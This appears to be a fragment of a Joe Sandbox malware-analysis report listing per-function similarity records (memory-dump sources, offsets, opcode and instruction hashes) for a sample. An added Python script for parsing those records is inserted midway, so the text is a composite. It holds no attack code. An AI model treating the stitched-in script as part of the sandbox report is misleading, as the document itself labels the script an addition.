                                                                                                                                                                                      • Instruction ID: 518d6d0113e266a091a0cbf43dd9b6b92f5400263bfdc1a72100ca210d41eac5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
                                                                                                                                                                                      • Instruction Fuzzy Hash: E7C2D274A042598FEB20CFA8C490B9DBBF1BF89308F24C559E855AB390D774E886CF51
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                      • Opcode ID: c4c3c7ef0a6a5c5010d93d3d05620519da551420264f624f327454c56b771e43
                                                                                                                                                                                      • Instruction ID: b9cfdf9aff36692a2be4ad7309719c75a621d287fa98b86d1028b92f8662c608
                                                                                                                                                                                      • Opcode Fuzzy Hash: c4c3c7ef0a6a5c5010d93d3d05620519da551420264f624f327454c56b771e43
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83A2F775A04229CFDB25CF68C890B99BBB1BB89304F2584D9D88DA7351DB30EE85CF51
                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: optimize
• API String ID: 0-3797040228
APIs
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
APIs
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
Strings
Similarity
• API ID:
• String ID: h(a
• API String ID: 0-2400461097
Strings
Similarity
• API ID:
• String ID: bua
• API String ID: 0-3993766197
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cdee5f106130f9c003e98ff858ec0a85d67dd58a6e597a66ac0da64aa36c3f40
                                                                                                                                                                                      • Instruction ID: 64511e9e7bc8a538c31c2dec79f9366059c8cda353a3f8e3c319e5c84b16a323
                                                                                                                                                                                      • Opcode Fuzzy Hash: cdee5f106130f9c003e98ff858ec0a85d67dd58a6e597a66ac0da64aa36c3f40
                                                                                                                                                                                      • Instruction Fuzzy Hash: A382EE74A442598FDB10DFA8C490B9EBBF6BF89308F60842DD899AB345DB74E845CF41
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 21b45eda36355293b148171c297a1f92822421f124cb838ff337ac2fa72ade97
                                                                                                                                                                                      • Instruction ID: bf890a49f948a95996c0874b8a48064969d64c08d11fd484a8260e1bd552f906
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21b45eda36355293b148171c297a1f92822421f124cb838ff337ac2fa72ade97
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4062D2789052298BDB25CF58C9807C9B7F1BB49314F2589EAD848AB351D774EEC1CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f1dee7a99a891ee5565045144e6040ae20f3dfe81c55f463185ef443a8cf5625
                                                                                                                                                                                      • Instruction ID: 9d8ba64b78ef50a58b18041be0aa597e26323e47a4c979711dc9b8f68f915d3c
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1dee7a99a891ee5565045144e6040ae20f3dfe81c55f463185ef443a8cf5625
                                                                                                                                                                                      • Instruction Fuzzy Hash: C362D774A05269CFDBA0CF68C880B89B7B1BB48308F2585E9D84DAB345D731EE95CF51
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 512f5679d71f5b72e1454146a5da98ac3b0e449553657a28cd75d0669e1a23ca
                                                                                                                                                                                      • Instruction ID: e0a500f3d695454715f18051163da62669697884006f913259c36ef59c383f1b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 512f5679d71f5b72e1454146a5da98ac3b0e449553657a28cd75d0669e1a23ca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5042B070A052859FEB54CFA8C48479EBBF1BF88308F24C56DE8589B391C736D861CB91
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 013831b072a80341eca218c0eace2ba53b8fb9120b1cbd4512949fd295a389ce
                                                                                                                                                                                      • Instruction ID: 7acb60ce99df90a8d4815b3c5ed6ca94b274d674d137866997d0d1df3706a504
                                                                                                                                                                                      • Opcode Fuzzy Hash: 013831b072a80341eca218c0eace2ba53b8fb9120b1cbd4512949fd295a389ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: 91525970A14269CFEBA4CF29C880B89B7B1BB49314F2481D9D84DAB342D731EE95DF51
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 33164d37dc1f8bc3c6465863d80b3bf23a647da6b8e1d50295bdad47704f48e9
                                                                                                                                                                                      • Instruction ID: 19f4867394c01e4d8c9e316edce12a8cee81f65b8fdb4e74c3c7cf9959f5a621
                                                                                                                                                                                      • Opcode Fuzzy Hash: 33164d37dc1f8bc3c6465863d80b3bf23a647da6b8e1d50295bdad47704f48e9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19121678A0525ADFCB05CFA9E480A8DB7F1BF59318F21C165E815AB360D774EC82CB90
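The entries above are the Joe Sandbox IDA plugin's per-function similarity records: each names the memory dump the function was carved from (with its load address and whether it was treated as a PE image), the associated dump segments, the snapshot file, the empty API/String similarity fields, and four hashes, where the Opcode ID repeats the Opcode Fuzzy Hash in every record shown. The Python below is an added example, not part of the report or of Joe Sandbox: it turns the flattened listing into one record per function, strips the bullet characters and the "Download File" link text left behind by the page extraction, sanity-checks each record, and groups the opcode ids by source dump so they can be fed to a similarity search. The sample listing is constructed from two records above; the second is abridged to three Associated lines.

```python
import re
from collections import defaultdict

# Constructed sample: two consecutive records copied from the report above
# (second one abridged). Indentation, bullets and the "Download File" link
# residue are kept on purpose so the parser has to cope with them.
SAMPLE = """\
    Memory Dump Source
    • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
    • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 21b45eda36355293b148171c297a1f92822421f124cb838ff337ac2fa72ade97
    • Instruction ID: bf890a49f948a95996c0874b8a48064969d64c08d11fd484a8260e1bd552f906
    • Opcode Fuzzy Hash: 21b45eda36355293b148171c297a1f92822421f124cb838ff337ac2fa72ade97
    • Instruction Fuzzy Hash: 4062D2789052298BDB25CF58C9807C9B7F1BB49314F2589EAD848AB351D774EEC1CF90
    Memory Dump Source
    • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
    • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f1dee7a99a891ee5565045144e6040ae20f3dfe81c55f463185ef443a8cf5625
    • Instruction ID: 9d8ba64b78ef50a58b18041be0aa597e26323e47a4c979711dc9b8f68f915d3c
    • Opcode Fuzzy Hash: f1dee7a99a891ee5565045144e6040ae20f3dfe81c55f463185ef443a8cf5625
    • Instruction Fuzzy Hash: C362D774A05269CFDBA0CF68C880B89B7B1BB48308F2585E9D84DAB345D731EE95CF51
"""

LINK_RESIDUE = "Download File"
HEX64_RE = re.compile(r"^[0-9a-f]{64}$")
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
# "Label in the listing" -> key in the parsed record
FIELDS = {
    "Snapshot File": "snapshot", "API ID": "api_id", "String ID": "string_id",
    "API String ID": "api_string_id", "Opcode ID": "opcode_id",
    "Instruction ID": "instruction_id", "Opcode Fuzzy Hash": "opcode_fuzzy",
    "Instruction Fuzzy Hash": "instruction_fuzzy",
}


def parse_records(text):
    """One dict per function record; a record runs from a 'Memory Dump Source'
    line to the next one. Bullets, indentation and link residue are dropped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "Memory Dump Source":
            cur = {"associated": []}
            records.append(cur)
            continue
        if cur is None or ":" not in line:
            continue  # bare section labels ("Similarity", ...) carry no value
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "Source File":
            m = SOURCE_RE.search(line)
            if m is None:
                raise ValueError("unparseable Source File line: %r" % line)
            cur["dump"] = m.group("dump")
            cur["offset"] = int(m.group("offset"), 16)
            cur["based_on_pe"] = m.group("pe") == "true"
        elif key == "Associated":
            if value.endswith(LINK_RESIDUE):
                value = value[: -len(LINK_RESIDUE)].strip()
            cur["associated"].append(value)
        elif key in FIELDS:
            cur[FIELDS[key]] = value or None  # empty similarity fields -> None
    return records


def check_record(rec):
    """Return a list of problems (empty when the record is consistent). On this
    page every Opcode ID equals its Opcode Fuzzy Hash, so a mismatch points at
    a mis-split or corrupted record rather than a real finding."""
    problems = []
    for field in ("opcode_id", "instruction_id", "opcode_fuzzy"):
        val = rec.get(field)
        if not val or not HEX64_RE.match(val):
            problems.append("%s is not a 64-hex-digit id: %r" % (field, val))
    if rec.get("opcode_id") != rec.get("opcode_fuzzy"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    if not re.fullmatch(r"[0-9A-Fa-f]+", rec.get("instruction_fuzzy") or ""):
        problems.append("Instruction Fuzzy Hash is not hex")
    if any(LINK_RESIDUE in a for a in rec["associated"]):
        problems.append("link residue left in Associated list")
    return problems


def group_by_dump(records):
    """Map (source dump, load address) -> opcode ids of the functions carved
    from it; this is the per-dump set you hand to a similarity search."""
    groups = defaultdict(list)
    for rec in records:
        groups[(rec["dump"], rec["offset"])].append(rec["opcode_id"])
    return dict(groups)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec["opcode_id"], rec["instruction_fuzzy"], check_record(rec))
    print(group_by_dump(recs))
```

The parser is deliberately keyed on the literal labels in the listing rather than on line positions, so it tolerates the missing or reordered fields that a cut-off or differently rendered report produces, and the residue stripping is confined to one place should the page extraction change.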
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cc2588524871c951a60f1b2fce8abbe6d5b26ae1e84268bc98c8063506949ee5
                                                                                                                                                                                      • Instruction ID: d69fdf5d9c806f7edba15bc314e05e9f3cdc1a2150cd31b96f5dbe42976c28ee
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2588524871c951a60f1b2fce8abbe6d5b26ae1e84268bc98c8063506949ee5
                                                                                                                                                                                      • Instruction Fuzzy Hash: C8022674A05245CFDF49CFA8C590A9DBBF2AF88318F25C069E815AB345DB36E891CF50
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c0cc950a9d611d45ec736ade90280dfb09da3b2b2986ef2fb50fd54848431665
                                                                                                                                                                                      • Instruction ID: c10a399038eb35cab1d0fd47fbf04f5bffad08025378c4b9320364a8326b92cd
                                                                                                                                                                                      • Opcode Fuzzy Hash: c0cc950a9d611d45ec736ade90280dfb09da3b2b2986ef2fb50fd54848431665
                                                                                                                                                                                      • Instruction Fuzzy Hash: EBB1273390E6858AD7118DB8CC92289BB63AFD6318B3CC365E060CE3CDD274C55AD352
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 8b20ede60a6127b02bffe7e2bb85883046ea4b044ceb5e2ba63dc4e0fa8fc931
                                                                                                                                                                                      • Instruction ID: 1edb749c10e8e23cb8f7e7bf4bb2cb1e8f1af70184db1bb38d613eb8a6dbdcd7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b20ede60a6127b02bffe7e2bb85883046ea4b044ceb5e2ba63dc4e0fa8fc931
                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC1E4B4E443598FDB00DFA8C48468DBBF1BF88318F25C929E8599B365D774D886CB81
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3e8a6c36cca57d6cb3f3a801d7d86d6ae23e9f5d0fd98d73f71e916c8d54b9c0
                                                                                                                                                                                      • Instruction ID: 878cb23af3a6350bf954d4178c5a2acd4654a5c4dc0d4d629278b81f8bee302c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8a6c36cca57d6cb3f3a801d7d86d6ae23e9f5d0fd98d73f71e916c8d54b9c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0C129B1A056488FDB04CFA9C88578EBBF1BF89304F148269D858DB35AD774D949CB81
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
